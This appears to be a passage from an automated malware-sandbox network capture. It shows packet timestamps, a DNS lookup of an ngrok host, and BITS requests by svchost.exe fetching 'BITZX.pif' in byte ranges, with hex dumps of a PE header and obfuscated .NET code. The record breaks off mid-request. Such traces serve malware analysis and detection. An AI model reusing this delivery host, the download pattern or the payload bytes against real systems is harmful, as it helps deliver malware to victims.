        Dec 16, 2024 17:47:36.059067965 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.059158087 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.059406042 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.059587955 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.059638977 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.387255907 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.387783051 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.387844086 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.388189077 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.388205051 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.842909098 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.843189955 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.843346119 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.843430042 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.843430042 CET49872443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:36.843475103 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:36.843492031 CET443498723.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.089711905 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.089798927 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.089998960 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.090082884 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.090112925 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.418637991 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.419023991 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.419079065 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.419569969 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.419615030 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.842555046 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.844003916 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.844187975 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.844274998 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.844274998 CET49873443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:38.844321966 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:38.844338894 CET443498733.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.120502949 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.120587111 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.120798111 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.120948076 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.120995998 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.450325966 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.450758934 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.450825930 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.451317072 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.451344013 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.878818989 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.879261017 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.879451036 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.879517078 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.879517078 CET49874443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:40.879530907 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:40.879534960 CET443498743.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.167121887 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.167211056 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.167438030 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.167560101 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.167593956 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.499340057 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.499828100 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.499911070 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.500256062 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.500300884 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.909132957 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.909260035 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.909426928 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.909646988 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.909646988 CET49875443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:43.909667969 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:43.909673929 CET443498753.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.212896109 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.212980986 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.213212967 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.213367939 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.213416100 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.541937113 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.542413950 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.542467117 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.542857885 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.542900085 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.981198072 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.981777906 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:47.981929064 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.981929064 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.981988907 CET49876443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:47.982038975 CET443498763.134.125.175192.168.11.20
        Dec 16, 2024 17:47:50.258898020 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:50.258972883 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:50.259238005 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:50.259310961 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:50.259335995 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:50.586694956 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:50.587205887 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:50.587255955 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:50.587676048 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:50.587707043 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:51.005863905 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:51.008399010 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:51.008574963 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:51.008574963 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:51.008671045 CET49877443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:51.008723021 CET443498773.134.125.175192.168.11.20
        Dec 16, 2024 17:47:53.305171967 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:53.305264950 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:53.305442095 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:53.305615902 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:53.305660963 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:53.633647919 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:53.634171009 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:53.634191036 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:53.634552956 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:53.634568930 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:54.061677933 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:54.062000990 CET443498783.134.125.175192.168.11.20
        Dec 16, 2024 17:47:54.062180042 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:54.062180042 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:54.062238932 CET49878443192.168.11.203.134.125.175
        Dec 16, 2024 17:47:54.062257051 CET443498783.134.125.175192.168.11.20

        UDP Packets

        TimestampSource PortDest PortSource IPDest IP
        Dec 16, 2024 17:39:37.379247904 CET6077553192.168.11.201.1.1.1
        Dec 16, 2024 17:39:37.536267996 CET53607751.1.1.1192.168.11.20

        DNS Queries

        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Dec 16, 2024 17:39:37.379247904 CET192.168.11.201.1.1.10xa58fStandard query (0)041224.ngrok-free.appA (IP address)IN (0x0001)false

        DNS Answers

        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.134.125.175A (IP address)IN (0x0001)false
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.17.7.232A (IP address)IN (0x0001)false
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.13.191.225A (IP address)IN (0x0001)false
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.14.182.203A (IP address)IN (0x0001)false
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.134.39.220A (IP address)IN (0x0001)false
        Dec 16, 2024 17:39:37.536267996 CET1.1.1.1192.168.11.200xa58fNo error (0)041224.ngrok-free.app3.22.30.40A (IP address)IN (0x0001)false

        HTTP Request Dependency Graph

        • 041224.ngrok-free.app

        HTTPS Proxied Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.11.20497093.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:37 UTC154OUTHEAD //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:38 UTC263INHTTP/1.1 200 OK
        Accept-Ranges: bytes
        Content-Length: 207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:37 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.11.20497103.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:38 UTC226OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=0-1119
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:39 UTC310INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 1120
        Content-Range: bytes 0-1119/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:38 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:39 UTC1120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ff bf 50 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 c4 e5 00 00 dc 02 00 00 00 00 00 6e e3 e5 00 00 20 00 00 00 00 e6 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 e9 00 00 02 00 00 21 e3 5c 0c 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELPgn @ !\@


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.11.20497113.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:42 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=1120-1332
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:42 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 213
        Content-Range: bytes 1120-1332/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:42 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:42 UTC213INData Raw: 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 16 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 2e 28 43 f5 00
        Data Ascii: *****0*0*0*0*0*0*0*.(C(9***0*0*.(C


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.11.20497123.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:45 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=1333-1479
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:46 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 147
        Content-Range: bytes 1333-1479/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:45 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:46 UTC147INData Raw: 06 28 39 f5 00 06 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 d0 03 00 00 01 00 00 11 28 43 f5 00 06 20 05 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 12 00 00 00 17 01 00 00 9f 02 00 00 ea 01 00 00 c4 02 00 00 39 03 00 00 48 03 00 00 b3 00 00 00 47 01 00 00 dd 00 00 00 2a 02 00 00 de 00 00 00 74 00 00 00 05 00 00 00 71 01 00 00 b6 01 00 00 f4 02 00 00 2f 00 00 00 ed 00 00 00 38 12 01 00 00 20 b3 be f1 88 20 94
        Data Ascii: (9***0(C 8E9HG*tq/8


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.11.20497133.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:49 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=1480-1956
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:50 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 477
        Content-Range: bytes 1480-1956/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:49 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:50 UTC477INData Raw: 69 5d 9f 61 7e 2b 68 00 04 7b 21 68 00 04 61 28 3d f5 00 06 80 16 00 00 04 20 11 00 00 00 38 84 ff ff ff 20 f1 04 d1 17 20 06 00 00 00 62 20 ca a7 58 f5 61 7e 2b 68 00 04 7b fe 67 00 04 61 28 3d f5 00 06 80 0e 00 00 04 20 0d 00 00 00 7e 2b 68 00 04 7b 1e 68 00 04 3a 4a ff ff ff 26 20 0f 00 00 00 38 3f ff ff ff 20 5f 90 13 96 20 8a 08 60 d9 61 7e 2b 68 00 04 7b e0 67 00 04 61 28 3d f5 00 06 80 15 00 00 04 20 03 00 00 00 7e 2b 68 00 04 7b 16 68 00 04 3a 0b ff ff ff 26 20 0c 00 00 00 38 00 ff ff ff 20 9f 0d 11 a8 20 b6 34 4c f5 61 7e 2b 68 00 04 7b 1b 68 00 04 61 28 3d f5 00 06 80 18 00 00 04 20 07 00 00 00 38 d6 fe ff ff 2a 28 29 f6 00 06 20 0d 00 00 00 38 c6 fe ff ff 20 94 27 38 e0 20 00 d1 3f 87 61 7e 2b 68 00 04 7b 0f 68 00 04 61 28 3d f5 00 06 80 17 00
        Data Ascii: i]a~+h{!ha(= 8 b Xa~+h{ga(= ~+h{h:J& 8? _ `a~+h{ga(= ~+h{h:& 8 4La~+h{ha(= 8*() 8 '8 ?a~+h{ha(=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.11.20497143.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:51 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=1957-1990
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:52 UTC311INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 34
        Content-Range: bytes 1957-1990/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:51 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:52 UTC34INData Raw: ff 20 bc c7 9a f1 66 20 c5 eb 17 5b 61 7e 2b 68 00 04 7b 03 68 00 04 61 28 3d f5 00 06 80 12 00 00 04
        Data Ascii: f [a~+h{ha(=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.11.20497153.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:54 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=1991-2096
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:55 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 106
        Content-Range: bytes 1991-2096/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:54 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:55 UTC106INData Raw: 20 0e 00 00 00 7e 2b 68 00 04 7b 38 68 00 04 39 94 fd ff ff 26 20 0e 00 00 00 38 89 fd ff ff 20 e9 d9 af a6 65 20 9a d6 40 4a 61 7e 2b 68 00 04 7b 28 68 00 04 61 28 3d f5 00 06 7e 49 68 00 04 28 7f f9 00 06 20 a7 3d 0a 0c 20 9c a9 aa 8e 61 20 36 17 b3 8e 61 7e 2b 68 00 04 7b 0d 68 00 04 61 28 3d f5 00 06 7e 4a 68 00
        Data Ascii: ~+h{8h9& 8 e @Ja~+h{(ha(=~Ih( = a 6a~+h{ha(=~Jh


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.11.20497163.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:39:58 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=2097-2210
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:39:59 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 114
        Content-Range: bytes 2097-2210/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:39:58 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:39:59 UTC114INData Raw: 04 28 83 f9 00 06 80 14 00 00 04 20 0b 00 00 00 7e 2b 68 00 04 7b fb 67 00 04 39 1f fd ff ff 26 20 0b 00 00 00 38 14 fd ff ff 19 80 10 00 00 04 20 00 00 00 00 7e 2b 68 00 04 7b ed 67 00 04 39 fa fc ff ff 26 20 03 00 00 00 38 ef fc ff ff 20 bb 69 bb 1a 20 4d 43 b3 76 59 20 a5 c3 84 95 61 7e 2b 68 00 04 7b 31 68 00 04 61 28 3d f5 00 06 80 11
        Data Ascii: ( ~+h{g9& 8 ~+h{g9& 8 i MCvY a~+h{1ha(=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.11.20497223.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:00 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=2211-2282
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:01 UTC311INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 72
        Content-Range: bytes 2211-2282/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:01 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:01 UTC72INData Raw: 00 00 04 20 02 00 00 00 38 bf fc ff ff 20 18 1a ad 27 20 06 00 00 00 63 20 87 4e d9 6f 61 7e 2b 68 00 04 7b 1a 68 00 04 61 28 3d f5 00 06 80 0f 00 00 04 20 01 00 00 00 7e 2b 68 00 04 7b 0c 68 00 04 39 85 fc ff ff 26
        Data Ascii: 8 ' c Noa~+h{ha(= ~+h{h9&


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.11.20497233.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:04 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=2283-2712
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:05 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 430
        Content-Range: bytes 2283-2712/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:04 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:05 UTC430INData Raw: 20 00 00 00 00 38 7a fc ff ff 28 3b f5 00 06 20 0a 00 00 00 38 6b fc ff ff 28 39 f5 00 06 20 04 00 00 00 7e 2b 68 00 04 7b 09 68 00 04 39 52 fc ff ff 26 20 04 00 00 00 38 47 fc ff ff 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 00 2a 1b 30 04 00 cd 04 00 00 0c 00 00 11 2b 05 28 4e 7b 6f 53 20 08 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 0f 00 00 00 4d 00 00 00 24 00 00 00 be 00 00 00 46 01 00 00 5c 00 00 00 1c 04 00 00 ff 00 00 00 05 00 00 00 4f 04 00 00 d4 00 00 00 70 00 00 00 ab 00 00 00 71 00 00 00 1c 01 00 00 39 04 00 00 38 48 00 00 00 7e 10 00 00 04 20 e8
        Data Ascii: 8z(; 8k(9 ~+h{h9R& 8G0*******0*0+(N{oS 8EM$F\Opq98H~


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.11.20497243.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:06 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=2713-3070
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
        2024-12-16 16:40:07 UTC312INHTTP/1.1 206 Partial Content
        Accept-Ranges: bytes
        Content-Length: 358
        Content-Range: bytes 2713-3070/207391736
        Content-Type: application/octet-stream
        Date: Mon, 16 Dec 2024 16:40:06 GMT
        Etag: "1519247886"
        Last-Modified: Fri, 06 Dec 2024 09:11:22 GMT
        Server: lighttpd/1.4.49 (win64)
        Connection: close
        2024-12-16 16:40:07 UTC358INData Raw: fe ff ff 11 04 7e 51 68 00 04 28 9f f9 00 06 20 0a 00 00 00 38 eb fe ff ff 11 04 7e 50 68 00 04 28 9b f9 00 06 20 02 00 00 00 7e 2b 68 00 04 7b 17 68 00 04 3a cb fe ff ff 26 20 02 00 00 00 38 c0 fe ff ff 14 fe 06 3b 00 00 06 73 2c 00 00 0a 73 2d 00 00 0a 13 00 20 05 00 00 00 38 a3 fe ff ff 16 7e 4e 68 00 04 28 93 f9 00 06 20 00 00 00 00 7e 2b 68 00 04 7b 11 68 00 04 3a 84 fe ff ff 26 20 00 00 00 00 38 79 fe ff ff 00 7e 0b 00 00 04 28 3b 01 00 06 7e 4c 68 00 04 28 8b f9 00 06 80 0b 00 00 04 20 03 00 00 00 7e 2b 68 00 04 7b df 67 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 03 00 45 0b 00 00 00 71 01 00 00 4e 01 00 00 cc 01 00 00 2b 01 00 00 bb 00 00 00 f3 00 00 00 4b 00 00 00 05 00 00 00 28 00 00 00 94 01 00 00 83 00 00 00 38 6c 01 00 00 7e
        Data Ascii: ~Qh( 8~Ph( ~+h{h:& 8;s,s- 8~Nh( ~+h{h:& 8y~(;~Lh( ~+h{g:& 8EqN+K(8l~


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        11192.168.11.20497253.134.125.1754437904C:\Windows\System32\svchost.exe
        TimestampBytes transferredDirectionData
        2024-12-16 16:40:08 UTC229OUTGET //BITZX.pif HTTP/1.1
        Connection: Keep-Alive
        Accept: */*
        Accept-Encoding: identity
        If-Unmodified-Since: Fri, 06 Dec 2024 09:11:22 GMT
        Range: bytes=3071-3267
        User-Agent: Microsoft BITS/7.8
        Host: 041224.ngrok-free.app
